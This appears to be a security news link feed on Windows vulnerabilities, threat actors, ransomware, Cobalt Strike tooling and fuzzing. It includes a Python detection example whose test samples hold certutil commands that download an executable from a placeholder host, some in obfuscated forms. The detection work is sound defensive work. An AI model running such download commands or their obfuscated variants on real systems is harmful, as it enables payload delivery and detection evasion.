Detecting CVE-2021-36934 (« SeriousSAM ») with Splunk #vuln #informatique
https://www.splunk.com/en_us/blog/security/detecting-serioussam-cve-2021-36934-with-splunk.html
Praying Mantis - A sophisticated, likely government-sponsored threat actor has been compromising major public and private organizations over the past year by exploiting deserialization flaws in public-facing #Microsoft ASP.NET applications to deploy fileless malware. The malware used by TG1021 shows a significant effort to avoid detection: it actively interferes with logging mechanisms, successfully evades commercial EDRs, and silently awaits incoming connections rather than connecting back to a C2 channel and continuously generating traffic. Furthermore, the threat actor actively removed all disk-resident tools after using them, effectively giving up persistence in exchange for stealth #cyber #threats
Malware authors are increasingly using rarely spotted programming languages such as #Go, #Rust, #Nim and #DLang in order to create new tools and to hinder analysis. Threat actors have begun to adopt them to rewrite known malware families or create tools for new #malware sets
https://threatpost.com/malware-makers-using-exotic-programming-languages/168117/
Chatter Indicates BlackMatter as #Darkside, #REvil Successor - On July 19, 2021, a threat actor operating under the alias « BlackMatter » registered an account on the high-tier Russian-language illicit forums XSS and Exploit. The actor deposited 4 BTC (~$150,000 USD) into their escrow account. Large deposits on the forum indicate the seriousness of the threat actor. On July 21, 2021, the threat actor posted a notice on the forums, stating they are looking to purchase access to infected corporate networks in the #US, #Canada, #Australia, and the #UK (Five Eyes), presumably for #ransomware operations. The threat actor said they are looking for larger #corporate networks with revenues of over US $100 million. #cyber #threats
https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/
#Microsoft #Windows 11: TPMs & #Digital Sovereignty - « We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. » #drm #tpm
Password spraying and bruteforcing tool for Active Directory Domain Services
Beaconator v1.1 is an aggressor script for Cobalt Strike used to generate raw stageless #shellcode and pack the generated shellcode with PEzor (an #opensource PE packer)
Axel Souchet (0vercl0k) recently open-sourced a promising new snapshot-based fuzzer. In his own words: « what the fuzz » or « wtf » is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. In this post, we will walk through the process of creating a fuzzer module for what the fuzz, allowing us to fuzz the packet parsing code of a popular triple-A multiplayer game title enjoyed by millions of active players. #fuzzing #informatique
Analysing Qakbot's Browser Hooking Module - Part 1
https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/
#Windows Command-Line Obfuscation : Project for identifying executables that have command-line options that can be obfuscated, possibly bypassing detection rules #python #informatique #tools
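The entry above is about executables whose option syntax tolerates several spellings, so that a detection rule written against the raw command line is bypassed by a trivially altered one. The following is an added illustration, not code from that project: a small Python canonicaliser that collapses the obfuscation forms the entry alludes to (switch character `/` versus `-`, dash look-alikes, inserted carets and quotes) before the rule is applied. The sample command lines, the `certutil -urlcache -f` rule and the set of characters treated as interchangeable are all constructed for the example; which variants a given Windows binary really accepts has to be checked per executable, which is exactly what the project catalogues.

```python
"""Added example (not the project's own code): normalise a Windows command line
before matching a detection rule, so option-obfuscated variants still hit.
Sample command lines and the rule are constructed for illustration."""
import re
import unicodedata

# Dash-like characters that some option parsers accept in place of '-'.
# Assumption: the exact set varies per binary; here all are folded to '-'.
DASH_VARIANTS = "\u2010\u2011\u2012\u2013\u2014\u2015\u2212"

# Characters cmd.exe or the target program discards before parsing
# (caret escapes and stray double quotes): "insertion"-style obfuscation.
INSERTED_CHARS = '^"'


def normalize(cmdline: str) -> str:
    """Canonicalise a command line so obfuscated option spellings collapse to one form."""
    s = unicodedata.normalize("NFKC", cmdline)            # fullwidth/compat forms -> ASCII
    s = s.translate({ord(c): "-" for c in DASH_VARIANTS})  # en/em dash, minus sign -> '-'
    s = s.translate({ord(c): None for c in INSERTED_CHARS})  # drop ^ and "
    tokens = []
    for tok in s.split():
        # Option-character substitution: '/opt' and '-opt' are the same switch
        # to most Windows parsers. Only a token that *starts* with '/' is
        # treated as an option; URLs and paths keep their slashes.
        if len(tok) > 1 and tok[0] == "/":
            tok = "-" + tok[1:]
        tokens.append(tok)
    return " ".join(tokens).lower()


# A rule as it is often written: matched against the raw command line.
RULE = re.compile(r"certutil(\.exe)?\b.*\s-urlcache\b.*\s-f\b", re.I)


def matches_raw(cmdline: str) -> bool:
    """Apply the rule to the command line as logged."""
    return RULE.search(cmdline) is not None


def matches_normalized(cmdline: str) -> bool:
    """Apply the same rule after canonicalisation."""
    return RULE.search(normalize(cmdline)) is not None


# Constructed samples: (command line, does it do what the rule targets?)
SAMPLES = [
    ('certutil.exe -urlcache -f http://example.test/a.exe a.exe', True),          # plain
    ('certutil.exe /urlcache /f http://example.test/a.exe a.exe', True),          # switch char
    ('certutil.exe \u2013urlcache \u2013f http://example.test/a.exe a.exe', True),  # en dash
    ('cert^util.exe -url"cache" -f http://example.test/a.exe a.exe', True),       # insertion
    ('certutil.exe -hashfile a.exe SHA256', False),                               # benign
]


def evaluate(samples=SAMPLES) -> dict:
    """Count how many of the labelled samples each matching strategy catches."""
    raw_hits = sum(1 for c, bad in samples if bad and matches_raw(c))
    norm_hits = sum(1 for c, bad in samples if bad and matches_normalized(c))
    false_pos = sum(1 for c, bad in samples if not bad and matches_normalized(c))
    return {"raw": raw_hits, "normalized": norm_hits, "false_positives": false_pos}


if __name__ == "__main__":
    for cmd, bad in SAMPLES:
        print(f"{'MAL' if bad else 'OK '}  raw={matches_raw(cmd)!s:5}  "
              f"norm={matches_normalized(cmd)!s:5}  {cmd}")
    print(evaluate())
```

The point is not the particular rule but the ordering: canonicalise first, match second. The cost is that a normaliser which is too eager (folding every leading `/`, stripping every quote) will also mangle legitimate arguments, so the folding rules belong per executable rather than global, which is why a per-binary inventory of accepted option syntaxes is useful to a detection engineer.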
Velociraptor - Windows.NTFS.MFT.HiveNightmare : This artifact uses Windows.NTFS.MFT to find several files created as part of the POC tooling for « HiveNightmare » (CVE-2021-36934) #vuln #windows
https://docs.velociraptor.app/exchange/artifacts/pages/windows.ntfs.mft.hivenightmare/
(CVE-2021-32749) fail2ban : The vulnerability could be massively exploited and lead to root-level code execution on multiple boxes; however, this is rather hard for a regular person to achieve. It all has its roots in the mailutils package and I found it by total accident when playing with the #mail command #linux #informatique
https://research.securitum.com/fail2ban-remote-code-execution/
An IT problem (#informatique) was behind the crash of the helicopter that killed six Canadian soldiers last year in Greece (#Grèce) #aero
The purpose of this post is to document what some Cobalt Strike techniques look like under the hood, from a defender's point of view. Realistically, this post is just breaking down a page straight from Cobalt Strike's website
#cyber crime has kept rising in Switzerland (#Suisse): 85% more cases reported. Insiders estimate the worldwide haul from these crimes at hundreds of billions of US dollars per year. « The more elaborate the ruse, the harder it is to detect. » (Nicolas Mayencourt).
Classified documents, allegedly from #Iran, reveal secret research into how a #cyber attack could be used to sink a cargo ship or blow up a fuel pump at a petrol station. Internal files also include information on satellite communication devices used by the global shipping industry as well as a computer-based system that controls things like lights, heating and ventilation in smart buildings across the world. The papers appear to reveal a particular interest in researching companies and activities in western countries, including the #UK, #France and #US. A security source with knowledge of the 57-page bundle of five research reports said it was compiled by a secret, offensive cyber unit called Shahid Kaveh, which is part of Iran's elite Islamic Revolutionary Guard Corps' (IRGC) cyber command #threats
sc(r)apy | full metal packets